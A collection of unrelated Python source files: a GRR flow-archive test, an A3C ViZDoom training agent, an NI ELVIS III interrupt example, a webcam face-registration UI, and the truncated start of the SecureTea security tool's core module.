# Start a flow. The exact type of the flow doesn't matter:
# we'll add results manually.
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
data_store.REL_DB.WriteFlowResults([
rdf_flow_objects.FlowResult(
client_id=client_id,
flow_id=flow_id,
payload=rdf_client_fs.StatEntry(
pathspec=rdf_paths.PathSpec(
path="/foo/bar1",
pathtype=rdf_paths.PathSpec.PathType.OS))),
rdf_flow_objects.FlowResult(
client_id=client_id,
flow_id=flow_id,
payload=rdf_client_fs.StatEntry(
pathspec=rdf_paths.PathSpec(
path="/foo/bar2",
pathtype=rdf_paths.PathSpec.PathType.OS))),
])
return client_id, flow_id
def testGetFilesArchiveGeneratesCorrectArchive(self):
client_id, flow_id = self._SetupFlowWithStatEntryResults()
blob_size = 1024 * 1024 * 4
blob_data, blob_refs = vfs_test_lib.GenerateBlobRefs(blob_size, "ab")
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.OS(client_id, ["foo", "bar1"]), blob_refs, blob_data)
blob_data, blob_refs = vfs_test_lib.GenerateBlobRefs(blob_size, "cd")
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.OS(client_id, ["foo", "bar2"]), blob_refs, blob_data)
zip_stream = io.BytesIO()
self.api.Client(client_id).Flow(flow_id).GetFilesArchive().WriteToStream(
zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
prefix = "%s_flow_ListProcesses_%s" % (client_id, flow_id)
namelist = zip_fd.namelist()
self.assertCountEqual(namelist, [
"%s/MANIFEST" % prefix,
"%s/%s/client_info.yaml" % (prefix, client_id),
"%s/%s/fs/os/foo/bar1" % (prefix, client_id),
"%s/%s/fs/os/foo/bar2" % (prefix, client_id),
])
for info in zip_fd.infolist():
self.assertGreater(info.compress_size, 0)
def testGetFilesArchiveFailsWhenFirstFileBlobIsMissing(self):
client_id, flow_id = self._SetupFlowWithStatEntryResults()
_, blob_refs = vfs_test_lib.GenerateBlobRefs(10, "0")
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.OS(client_id, ["foo", "bar1"]), blob_refs, [])
zip_stream = io.BytesIO()
with self.assertRaisesRegex(grr_api_errors.UnknownError,
"Could not find one of referenced blobs"):
self.api.Client(client_id).Flow(flow_id).GetFilesArchive().WriteToStream(
zip_stream)
def testGetFilesArchiveDropsStreamingResponsesWhenSecondFileBlobIsMissing(
self):
client_id, flow_id = self._SetupFlowWithStatEntryResults()
blob_data, blob_refs = vfs_test_lib.GenerateBlobRefs(1024 * 1024 * 4, "abc")
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.OS(client_id, ["foo", "bar1"]), blob_refs, blob_data[0:2])
zip_stream = io.BytesIO()
timestamp = rdfvalue.RDFDatetime.Now()
self.api.Client(client_id).Flow(flow_id).GetFilesArchive().WriteToStream(
zip_stream)
with self.assertRaises(zipfile.BadZipfile):
zipfile.ZipFile(zip_stream)
# Check that notification was pushed indicating the failure to the user.
pending_notifications = list(self.api.GrrUser().ListPendingNotifications(
timestamp=timestamp.AsMicrosecondsSinceEpoch()))
self.assertLen(pending_notifications, 1)
self.assertEqual(
pending_notifications[0].data.notification_type,
int(rdf_objects.UserNotification.Type
.TYPE_FILE_ARCHIVE_GENERATION_FAILED))
self.assertEqual(pending_notifications[0].data.reference.type,
pending_notifications[0].data.reference.FLOW)
self.assertEqual(pending_notifications[0].data.reference.flow.client_id,
client_id)
self.assertEqual(pending_notifications[0].data.reference.flow.flow_id,
flow_id)
# TODO(user): These unit tests should be moved to a dedicated GrrApi test.
def testClientReprContainsClientId(self):
client_id = self.SetupClient(0)
client_ref = self.api.Client(client_id=client_id)
self.assertIn(client_id, repr(client_ref))
self.assertIn(client_id, repr(client_ref.Get()))
def testFlowReprContainsMetadata(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
flow_ref = self.api.Client(client_id=client_id).Flow(flow_id)
self.assertIn(client_id, repr(flow_ref))
self.assertIn(flow_id, repr(flow_ref))
flow = flow_ref.Get()
self.assertIn(client_id, repr(flow))
self.assertIn(flow_id, repr(flow))
self.assertIn("ListProcesses", repr(flow))
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
agent_a3c_1.py
|
#!/usr/bin/env python
from __future__ import print_function
import numpy as np
import cv2
import tensorflow as tf
import threading
import sys
import time
import os
def MakeDir(path):
try:
os.makedirs(path)
except:
pass
lab = False
load_model = False
train = True
test_display = False
test_write_video = True
path_work_dir = "rl_3d/"
vizdoom_path = "ViZDoom/"
vizdoom_scenario = vizdoom_path + "scenarios/locha_home.wad"
if (lab):
from env_lab import EnvLab
model_path = path_work_dir + "model_lab_a3c/"
else:
from env_vizdoom_1 import EnvVizDoom
model_path = path_work_dir + "model_vizdoom_a3c/"
learning_rate = 0.00025
device = "/cpu:0"
num_workers = 3
t_max = 30
frame_repeat = 4 #10 # 4
gamma = 0.99
step_num = int(2.5e5)
save_each = 0.01 * step_num
step_load = 100
entropy_beta = 0.01
grad_norm_clip = 40.0
global_scope_name = "global"
step = 0
train_scores = []
lock = threading.Lock()
start_time = 0
# Global.
env = None
MakeDir(model_path)
model_name = model_path + "a3c"
def PrintStat(elapsed_time, step, step_num, train_scores):
steps_per_s = 1.0 * step / elapsed_time
steps_per_m = 60.0 * step / elapsed_time
steps_per_h = 3600.0 * step / elapsed_time
steps_remain = step_num - step
remain_h = int(steps_remain / steps_per_h)
remain_m = int((steps_remain - remain_h * steps_per_h) / steps_per_m)
remain_s = int((steps_remain - remain_h * steps_per_h - remain_m * steps_per_m) / steps_per_s)
elapsed_h = int(elapsed_time / 3600)
elapsed_m = int((elapsed_time - elapsed_h * 3600) / 60)
elapsed_s = int((elapsed_time - elapsed_h * 3600 - elapsed_m * 60))
print("{}% | Steps: {}/{}, {:.2f}M step/h, {:02}:{:02}:{:02}/{:02}:{:02}:{:02}".format(
100.0 * step / step_num, step, step_num, steps_per_h / 1e6,
elapsed_h, elapsed_m, elapsed_s, remain_h, remain_m, remain_s), file=sys.stderr)
mean_train = 0
std_train = 0
min_train = 0
max_train = 0
if (len(train_scores) > 0):
train_scores = np.array(train_scores)
mean_train = train_scores.mean()
std_train = train_scores.std()
min_train = train_scores.min()
max_train = train_scores.max()
print("Episodes: {} Rewards: mean: {:.2f}, std: {:.2f}, min: {:.2f}, max: {:.2f}".format(
len(train_scores), mean_train, std_train, min_train, max_train), file=sys.stderr)
channels = 3
resolution = (40, 40, channels)
def Preprocess(frame):
if (channels == 1):
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = cv2.resize(frame, (resolution[1], resolution[0]))
return np.reshape(frame, resolution)
class ACNet(object):
def __init__(self, num_actions, scope, trainer):
with tf.variable_scope(scope):
self.inputs = tf.placeholder(shape=[None] + list(resolution), dtype=tf.float32)
conv1 = tf.contrib.layers.conv2d(self.inputs, num_outputs=16, kernel_size=[3, 3], stride=[2, 2])
conv2 = tf.contrib.layers.conv2d(conv1, num_outputs=32, kernel_size=[3, 3], stride=[2, 2])
conv2_flat = tf.contrib.layers.flatten(conv2)
hidden = tf.contrib.layers.fully_connected(conv2_flat, 256)
# Recurrent network for temporal dependencies
# Introduce a "fake" batch dimension of 1 after flatten so that we can do LSTM over time dim
rnn_in = tf.expand_dims(hidden, [0])
lstm_size = 256
lstm_cell = tf.contrib.rnn.BasicLSTMCell(lstm_size, state_is_tuple=True)
step_size = tf.shape(self.inputs)[:1]
c_init = np.zeros((1, lstm_cell.state_size.c), dtype=np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), dtype=np.float32)
self.state_init = [c_init, h_init]
self.rnn_state = self.state_init
c_in = tf.placeholder(shape=[1, lstm_cell.state_size.c], dtype=tf.float32)
h_in = tf.placeholder(shape=[1, lstm_cell.state_size.h], dtype=tf.float32)
self.state_in = (c_in, h_in)
state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(lstm_cell, rnn_in, initial_state=state_in,
sequence_length=step_size, time_major=False)
lstm_c, lstm_h = lstm_state
rnn_out = tf.reshape(lstm_outputs, [-1, lstm_size])
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
# Output layers for policy and value estimations
self.policy = tf.contrib.layers.fully_connected(rnn_out, num_actions, activation_fn=tf.nn.softmax,
weights_initializer=self.normalized_columns_initializer(0.01),
biases_initializer=None)
self.value = tf.contrib.layers.fully_connected(rnn_out, 1, activation_fn=None,
weights_initializer=self.normalized_columns_initializer(1.0),
biases_initializer=None)
# Only the worker network need ops for loss functions and gradient updating.
if (scope != global_scope_name):
self.actions = tf.placeholder(shape=[None], dtype=tf.int32)
actions_onehot = tf.one_hot(self.actions, num_actions, dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)
self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)
responsible_outputs = tf.reduce_sum(self.policy * actions_onehot, [1])
# Loss functions
value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))
entropy = -tf.reduce_sum(self.policy * tf.log(self.policy))
policy_loss = -tf.reduce_sum(tf.log(responsible_outputs) * self.advantages)
self.loss = 0.5 * value_loss + policy_loss - entropy * entropy_beta
# Get gradients from local network using local losses
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
self.gradients = tf.gradients(self.loss, local_vars)
if (grad_norm_clip != None):
grads, _ = tf.clip_by_global_norm(self.gradients, grad_norm_clip)
else:
grads = self.gradients
# Apply local gradients to global network
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, global_scope_name)
self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))
# Used to initialize weights for policy and value output layers
def normalized_columns_initializer(self, std = 1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
def Train(self, sess, discounted_rewards, states, actions, advantages):
states = states / 255.0
self.ResetLstm()
feed_dict = {self.target_v : discounted_rewards,
self.inputs : np.stack(states, axis=0),
self.actions : actions,
self.advantages : advantages,
self.state_in[0] : self.rnn_state[0],
self.state_in[1] : self.rnn_state[1]}
_ = sess.run([self.apply_grads], feed_dict=feed_dict)
def ResetLstm(self):
self.rnn_state = self.state_init
def GetAction(self, sess, state):
state = state / 255.0
a_dist, v, self.rnn_state = sess.run([self.policy, self.value, self.state_out],
feed_dict={self.inputs: [state],
self.state_in[0]: self.rnn_state[0],
self.state_in[1]: self.rnn_state[1]})
a = np.random.choice(a_dist[0], p=a_dist[0])
a = np.argmax(a_dist == a)
return a, v[0, 0]
def GetValue(self, sess, state):
state = state / 255.0
v = sess.run([self.value],
feed_dict={self.inputs: [state],
self.state_in[0]: self.rnn_state[0],
self.state_in[1]: self.rnn_state[1]})
return v[0][0, 0]
class Worker(object):
def __init__(self, number, num_actions, trainer, model_name):
self.name = "worker_" + str(number)
self.number = number
self.model_name = model_name
# Create the local copy of the network and the tensorflow op to copy global paramters to local network
self.local_ac = ACNet(num_actions, self.name, trainer)
self.update_target_graph = self.update_target(global_scope_name, self.name)
if (lab):
self.env = EnvLab(80, 80, 60, "seekavoid_arena_01")
else:
self.env = EnvVizDoom(vizdoom_scenario)
# Copies one set of variables to another.
# Used to set worker network parameters to those of global network.
def update_target(self, from_scope, to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var, to_var in zip(from_vars, to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
# Calculate discounted returns.
def Discount(self, x, gamma):
for idx in reversed(range(len(x) - 1)):
x[idx] += x[idx + 1] * gamma
return x
def Start(self, session, saver, coord):
worker_process = lambda: self.Process(session, saver, coord)
thread = threading.Thread(target=worker_process)
thread.start()
global start_time
start_time = time.time()
return thread
def Train(self, episode_buffer, sess, bootstrap_value):
episode_buffer = np.array(episode_buffer)
states = episode_buffer[:, 0]
actions = episode_buffer[:, 1]
rewards = episode_buffer[:, 2]
values = episode_buffer[:, 3]
# Here we take the rewards and values from the episode_buffer, and use them to
# generate the advantage and discounted returns.
# The advantage function uses "Generalized Advantage Estimation"
rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
discounted_rewards = self.Discount(rewards_plus, gamma)[:-1]
value_plus = np.asarray(values.tolist() + [bootstrap_value])
advantages = rewards + gamma * value_plus[1:] - value_plus[:-1]
advantages = self.Discount(advantages, gamma)
# Update the global network using gradients from loss
# Generate network statistics to periodically save
self.local_ac.Train(sess, discounted_rewards, states, actions, advantages)
def Process(self, sess, saver, coord):
global step, train_scores, start_time, lock
print("Starting worker " + str(self.number))
while (not coord.should_stop()):
sess.run(self.update_target_graph)
episode_buffer = []
episode_reward = 0
self.env.Reset()
s = self.env.Observation()
s = Preprocess(s)
self.local_ac.ResetLstm()
while (self.env.IsRunning()):
# Take an action using probabilities from policy network output.
a, v = self.local_ac.GetAction(sess, s)
r = self.env.Act(a, frame_repeat)
finished = not self.env.IsRunning()
if (not finished):
s1 = self.env.Observation()
s1 = Preprocess(s1)
else:
s1 = None
episode_buffer.append([s, a, r, v])
episode_reward += r
s = s1
lock.acquire()
step += 1
if (step % save_each == 0):
model_name_curr = self.model_name + "_{:04}".format(int(step / save_each))
print("\nSaving the network weigths to:", model_name_curr, file=sys.stderr)
saver.save(sess, model_name_curr)
PrintStat(time.time() - start_time, step, step_num, train_scores)
train_scores = []
if (step == step_num):
coord.request_stop()
lock.release()
# If the episode hasn't ended, but the experience buffer is full, then we
# make an update step using that experience rollout.
if (len(episode_buffer) == t_max or (finished and len(episode_buffer) > 0)):
# Since we don't know what the true final return is,
# we "bootstrap" from our current value estimation.
if (not finished):
v1 = self.local_ac.GetValue(sess, s)
self.Train(episode_buffer, sess, v1)
episode_buffer = []
sess.run(self.update_target_graph)
else:
self.Train(episode_buffer, sess, 0.0)
lock.acquire()
train_scores.append(episode_reward)
lock.release()
class Agent(object):
def __init__(self):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.log_device_placement = False
config.allow_soft_placement = True
self.session = tf.Session(config=config)
with tf.device(device):
# Global network
self.global_net = ACNet(env.NumActions(), global_scope_name, None)
if (train):
trainer = tf.train.RMSPropOptimizer(learning_rate)
workers = []
for i in range(num_workers):
workers.append(Worker(i, env.NumActions(), trainer, model_name))
saver = tf.train.Saver(max_to_keep=100)
if (load_model):
model_name_curr = model_name + "_{:04}".format(step_load)
print("Loading model from: ", model_name_curr)
saver.restore(self.session, model_name_curr)
else:
self.session.run(tf.global_variables_initializer())
if (train):
coord = tf.train.Coordinator()
# Start the "work" process for each worker in a separate thread.
worker_threads = []
for worker in workers:
thread = worker.Start(self.session, saver, coord)
worker_threads.append(thread)
coord.join(worker_threads)
def Reset(self):
self.global_net.ResetLstm()
def Act(self, state):
action, _ = self.global_net.GetAction(self.session, state)
return action
def Test(agent):
if (test_write_video):
size = (640, 480)
fps = 30.0
fourcc = cv2.VideoWriter_fourcc(*'XVID') # cv2.cv.CV_FOURCC(*'XVID')
out_video = cv2.VideoWriter(path_work_dir + "test.avi", fourcc, fps, size)
reward_total = 0
num_episodes = 30
while (num_episodes != 0):
if (not env.IsRunning()):
env.Reset()
agent.Reset()
print("Total reward: {}".format(reward_total))
reward_total = 0
num_episodes -= 1
state_raw = env.Observation()
state = Preprocess(state_raw)
action = agent.Act(state)
for _ in range(frame_repeat):
if (test_display):
cv2.imshow("frame-test", state_raw)
cv2.waitKey(20)
if (test_write_video):
out_video.write(state_raw)
reward = env.Act(action, 1)
reward_total += reward
if (not env.IsRunning()):
break
state_raw = env.Observation()
if __name__ == '__main__':
if (lab):
env = EnvLab(80, 80, 60, "seekavoid_arena_01")
else:
env = EnvVizDoom(vizdoom_scenario)
agent = Agent()
Test(agent)
|
DIIRQ.py
|
"""
NI ELVIS III Digital Input Interrupt Example
This example illustrates how to register a digital input interrupt (DI IRQ) on
the NI ELVIS III. The program first defines the configuration for the DI IRQ,
and then creates a thread to wait for an interrupt. The irq_handler function
executes when the DI channel receives an appropriate digital signal to trigger
the interrupt conditions.
The DI IRQ configuration consists of seven parameters: irq_channel, irq_handler,
irq_number, timeout, interrupt_type_rising, interrupt_type_falling, and
edge_count. There are four DI channels that support DI IRQ configuration, which are
DIO0 to DIO3 on bank A. Each configuration contains two parameters to define
whether to register the interrupt at the rising edge or falling edge as
indicated in this table:
interrupt_type_rising True False True
interrupt_type_falling False True True
There are 8 IRQ numbers (IRQ1 to IRQ8). You cannot register an I/O interrupt
with the same IRQ number as that of a registered I/O interrupt. However, after
you close the existing interrupt, you can use the IRQ number to register another
interrupt.
irq_handler defines the callback function which you use to handle interrupts.
The callback function executes when the interrupt occurs. You can customize
the callback function as needed. For example, you can write code to make an
LED flash as shown in this example, or to read from an AI channel.
This example uses:
Bank A, Channel DIO0.
Hardware setup:
Connect a digital signal source to DIO0 on bank A. Send a digital signal
that meets the interrupt conditions we configure before the timeout
expires. You can connect BTN0 to DIO0 on bank A to trigger the interrupt as
indicated in this table:
1. Connect a pin of a 10k Ohm resistance to both BTN0 A and DIO0 on
bank A.
2. Connect a +3.3 V voltage source to another pin of the 10k Ohm
resistance.
3. Connect BTN0 B to DGND.
Press BTN0. The interrupt is triggered.
Result:
A thread is created to wait for an interrupt. LED0 flashes for 25 seconds
while waiting for an interrupt. An interrupt occurs when DIO0 receives an
appropriate digital signal that meets the interrupt conditions. To trigger
the interrupt, press BTN0 before the timeout expires. The program then
calls the irq_handler function, which makes LED1 flash for 3 seconds.
While LED1 is flashing, LED0 will also keep flashing until the program
ends.
"""
import time
import threading
from nielvis import DIIRQ, LEDs, DIOChannel, IRQNumber, Led
def irq_handler():
"""
irq_handler contains the code you want to execute when the interrupt
occurs. Define your own callback function here by rewriting the code. We
make an LED flash in this example.
"""
# open an LED session
with LEDs() as LED:
# specify the LED which you want to control
led = Led.LED1
# specify the LED status
led_on_off = True
# writes values 10 times, which makes LED1 flash for 3 seconds
for x in range(0, 10):
# turn LED0 on or off
LED.write(led, led_on_off)
# add a short delay
time.sleep(0.3)
# if the LED is on, set the parameter to off
# if the LED is off, set the parameter to on
led_on_off = not led_on_off
# specify the DIO channel that serves as the interrupt channel
irq_channel = DIOChannel.DIO0
# specify the identifier of the interrupt to register
irq_number = IRQNumber.IRQ1
# specify the amount of time, in milliseconds, to wait for an interrupt to
# occur before timing out
timeout = 6000
# specify whether to register an interrupt on the rising edge or the
# falling edge of the digital input signal. To register an interrupt on
# the rising edge of the digital input signal, set interrupt_type_rising
# as True and interrupt_type_falling as False
interrupt_type_rising = True
interrupt_type_falling = False
# specify the number of edges of the signal that must occur for this
# program to register an interrupt. For example, when
# interrupt_type_rising is True and edge_count is 1, an interrupt occurs
# when the DIO channel receives one rising edge
edge_count = 1
# configure a digital input interrupt session
with DIIRQ(irq_channel,
irq_handler,
irq_number,
timeout,
interrupt_type_rising,
interrupt_type_falling,
edge_count) as DI_IRQ:
# open the LED session
LED = LEDs()
# specify the LED which you want to control
led = Led.LED0
# specify the LED status
led_on_off = True
# create a thread to wait for the interrupt
irq_thread = threading.Thread(target=DI_IRQ.wait)
irq_thread.start()
# writes values 50 times, which makes LED0 flash for 25 seconds
for x in range(0, 50):
# turn LED0 on or off
LED.write(led, led_on_off)
# add a short delay
time.sleep(0.5)
# if the LED is on, set the parameter to off
# if the LED is off, set the parameter to on
led_on_off = not led_on_off
# close the LED session
LED.close()
|
face_ui.py
|
from cv2 import circle
from cv2 import rectangle
from numpy import savez_compressed
from PIL import Image, ImageTk
from tkinter import Tk, Button, Label, Entry
import cv2
import face_utils
import numpy as np
import PIL
import threading
import load_dummy_data
def CreateDummyDataSet():
trainX, trainy = load_dummy_data.load_dataset(
'5-celebrity-faces-dataset/train/')
# load test dataset
testX, testy = load_dummy_data.load_dataset(
'5-celebrity-faces-dataset/val/')
savez_compressed('faceset/dummy.npz', trainX, trainy, testX, testy)
def runFaceThread(required_size=(160, 160)):
if(e1.get() == ""):
print("Enter the label to register face")
return
print ("Creating Trainset")
trainX, trainy = face_utils.createTrainSet(cap, e1.get())
# print(" 2 -- > trainx shape",
# str(trainX.shape[0]), "train y shape", str(trainy.shape[0]))
print ("Creating Testset")
testX, testy = face_utils.createTestSet(cap, e1.get())
#CreateDummyDataSet()
# testX = np.concatenate((testX, dummytestX), axis=0)
# testy = np.concatenate((testy, dummytesty), axis=0)
print ("Saving face " + e1.get() + "to faceset/")
savez_compressed('faceset/' + e1.get() + '.npz',
trainX, trainy, testX, testy)
face_utils.create_faceEmbeddings()
#face_utils.train_face()
def registerFace():
#threading.Thread(target=runFaceThread).start()
runFaceThread()
def predictFace():
#cap.set(cv2.CAP_PROP_CONVERT_RGB, 0);
_, frame = cap.read()
frame = cv2.flip(frame, 1)
face_utils.UseMTCNN(frame)
face_utils.predict(frame)
root = Tk()
width, height = 800, 600
cap = cv2.VideoCapture(1)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
btn = Button(root, text="Register face!", command=registerFace)
#btn.grid(row=1, column=0, sticky=W, pady=4)
btn.pack(side="bottom", fill="both", expand="yes", padx=10, pady=10)
name = Label(root,
text="Enter Name")
name.pack(side="bottom", fill="both", expand="yes", padx=10, pady=10)
e1 = Entry(root)
#1.grid(row=0, column=1)
e1.pack(side="bottom", fill="both", expand="yes", padx=10, pady=10)
# predict_btn = Button(root, text="Predict face!", command=predictFace)
# #btn.grid(row=1, column=0, sticky=W, pady=4)
# predict_btn.pack(side="bottom", fill="both", expand="yes", padx=10, pady=10)
root.bind('<Escape>', lambda e: root.quit())
lmain = Label(root)
def show_frame():
_, frame = cap.read()
frame = cv2.flip(frame, 1)
face_utils.UseMTCNN(frame)
face_utils.predict(frame)
#predictFace()
print("Showing face box");
cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
img = PIL.Image.fromarray(cv2image)
imgtk = ImageTk.PhotoImage(image=img)
lmain.imgtk = imgtk
lmain.configure(image=imgtk)
lmain.after(10, show_frame)
show_frame()
lmain.pack()
root.mainloop()
cap.release()
cv2.destroyAllWindows()
|
core.py
|
# -*- coding: utf-8 -*-
u"""SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Version: 1.1
Module: SecureTea
"""
# To share mouse gestures
import struct
import sys
import time
import threading
from securetea import configurations
from securetea import logger
from securetea.lib.notifs import secureTeaTwitter
from securetea.lib.notifs.secureTeaTelegram import SecureTeaTelegram
from securetea.lib.notifs import secureTeaSlack
from securetea.lib.notifs.aws import secureTeaAwsSES
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.notifs import secureTeaTwilio
from securetea.lib.notifs import secureTeaWhatsapp
from securetea.lib.notifs import secureTeaGmail
from securetea.args.arguments import get_args
from securetea.args.args_helper import ArgsHelper
from securetea.lib.firewall.utils import setup_logger
from securetea.lib.security_header import secureTeaHeaders
from securetea.lib.ids import secureTeaIDS
from securetea.lib.waf.Server import SecureTeaWaf
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.iot import iot_checker
from securetea.lib.social_engineering.socialEngineering import SecureTeaSocialEngineering
from securetea.lib.history_logger.secureTeaHistoryLogger import SecureTeaHistoryLogger
from securetea.lib.history_logger.historylogger_logger import HistoryLogger
from securetea.modes import server_mode
from securetea.modes import system_mode
from securetea.modes import iot_mode
pynput_status = True
try:
from pynput import mouse
except Exception as e:
pynput_status = False
class SecureTea(object):
"""SecureTea Class."""
alert_count = 1
def __init__(self):
"""Init SecureTea params.
Args:
None
Raises:
None
Returns:
None
Working:
Collects the arguments passed and calls the respected module accordingly
for parsing the arguments. Further, creates object for the demanded
notification medium and starts SecureTea.
"""
modulename = 'Core'
self.cred = {}
args = get_args()
argsHelper = ArgsHelper(args)
try:
args_dict = argsHelper.check_args()
except KeyboardInterrupt:
print('\nKeyboard Interrupt detected. \nQuitting....')
exit(0)
credentials = configurations.SecureTeaConf()
self.cred = args_dict['cred']
self.history_logger = self.cred['history_logger']
self.cred_provided = args_dict['cred_provided']
self.twitter_provided = args_dict['twitter_provided']
self.telegram_provided = args_dict['telegram_provided']
self.twilio_provided = args_dict['twilio_provided']
self.whatsapp_provided = args_dict['whatsapp_provided']
self.social_eng_provided = args_dict['social_eng_provided']
self.slack_provided = args_dict['slack_provided']
self.aws_ses_provided = args_dict['aws_ses_provided']
self.gmail_provided = args_dict['gmail_provided']
self.firewall_provided = args_dict['firewall_provided']
self.insecure_headers_provided = args_dict['insecure_headers_provided']
self.ids_provided = args_dict['ids_provided']
self.waf_provided=args_dict["waf_provided"]
self.system_log_provided = args_dict['system_log_provided']
self.server_log_provided = args_dict['server_log_provided']
self.auto_server_patcher_provided = args_dict['auto_server_patcher_provided']
self.web_deface_provided = args_dict['web_deface_provided']
self.antivirus_provided = args_dict['antivirus_provided']
self.iot_checker_provided = args_dict['iot_checker_provided']
self.server_mode = args_dict["server_mode"]
self.system_mode = args_dict["system_mode"]
self.iot_mode = args_dict["iot_mode"]
# Initialize logger
self.logger = logger.SecureTeaLogger(
modulename,
self.cred['debug']
)
# Setup logger for utils
setup_logger(debug=self.cred['debug'])
if self.cred_provided and not self.cred['skip_config_file']:
credentials.save_creds(self.cred)
elif not self.cred['skip_config_file']:
self.cred = credentials.get_creds(args)
try:
if self.cred['social_eng']:
self.social_eng_provided = True
except KeyError:
self.logger.log(
"Social Engineering configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twitter']:
self.twitter_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twitter configuration parameter not set.",
logtype="error"
)
try:
if self.cred['telegram']:
self.telegram_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Telegram configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twilio']:
self.twilio_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twilio configuration parameter not set.",
logtype="error"
)
try:
if self.cred['whatsapp']:
self.whatsapp_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Whatsapp configuration parameter not set.",
logtype="error"
)
try:
if self.cred['slack']:
self.slack_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Slack configuration parameter not set.",
logtype="error"
)
try:
if self.cred['aws_ses']:
self.aws_ses_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AWS SES configuration parameter not set.",
logtype="error"
)
try:
if self.cred['gmail']:
self.gmail_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Gmail configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['firewall']:
self.firewall_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Firewall configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['insecure_headers']:
self.insecure_headers_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Insecure headers parameter not set.",
logtype="error"
)
try:
if self.cred['ids']:
self.ids_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) not set.",
logtype="error"
)
try:
if self.cred['server_log']:
self.server_log_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Server Log configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['auto_server_patcher']:
self.auto_server_patcher_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Auto server patcher configuraton not set.",
logtype="error"
)
try:
if self.cred['web-deface']:
self.web_deface_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Web Deface Detection configuraton not set.",
logtype="eror"
)
try:
if self.cred['antivirus']:
self.antivirus_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AntiVirus configuraton not set.",
logtype="error"
)
try:
if self.cred['iot-check']:
self.iot_checker_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"IoT Checker configuraton not set.",
logtype="error"
)
if not self.cred:
self.logger.log(
"Configuration not found.",
logtype="error"
)
sys.exit(0)
if not self.cred_provided and not (self.cred['history_logger'] or self.cred['clamav'] or self.cred['yara']):
self.logger.log(
"None of the notifications configured. Exiting...",
logtype="error"
)
sys.exit(0)
self.logger.log(
"Welcome to SecureTea..!! Initializing System",
logtype="info"
)
# Initialize modes at first (Server, System, IoT)
# Check for Server mode
if self.server_mode:
self.logger.log(
"Starting SecureTea in server mode",
logtype="info"
)
# Initialize Server Mode object
self.server_mode_obj = server_mode.ServerMode(cred=self.cred, debug=self.cred["debug"])
self.server_mode_obj.start_server_mode()
# Avoid multiple process of the objects created by the server mode, set their credentials to False
self.firewall_provided = False
self.server_log_provided = False
self.antivirus_provided = False
self.web_deface_provided = False
self.system_log_provided = False
self.auto_server_patcher_provided = False
self.waf_provided=False
self.ids_provided = False
# Check for System mode
if self.system_mode:
self.logger.log(
"Starting SecureTea in system mode",
logtype="info"
)
# Initialize System Mode object
self.system_mode_obj = system_mode.SystemMode(cred=self.cred, debug=self.cred["debug"])
self.system_mode_obj.start_system_mode()
# Avoid multiple process of the objects created by the system mode, set their credentials to False
self.firewall_provided = False
self.antivirus_provided = False
self.system_log_provided = False
